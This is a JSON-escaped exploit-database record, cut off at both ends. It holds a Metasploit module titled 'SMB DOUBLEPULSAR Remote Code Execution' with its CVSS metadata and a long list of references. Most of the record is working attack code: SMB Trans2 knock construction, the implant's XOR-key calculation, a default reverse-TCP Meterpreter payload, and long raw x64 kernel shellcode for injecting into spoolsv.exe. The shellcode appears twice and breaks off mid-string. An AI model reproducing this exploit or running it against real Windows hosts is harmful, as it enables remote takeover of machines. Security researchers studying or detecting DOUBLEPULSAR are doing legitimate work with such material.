\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-30] #"}, "lastseen": "2021-10-29T22:19:20", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2650fe11832782e6004bcfa4729ad94f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-30T23:12:04", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-30T23:12:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-30T23:12:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" 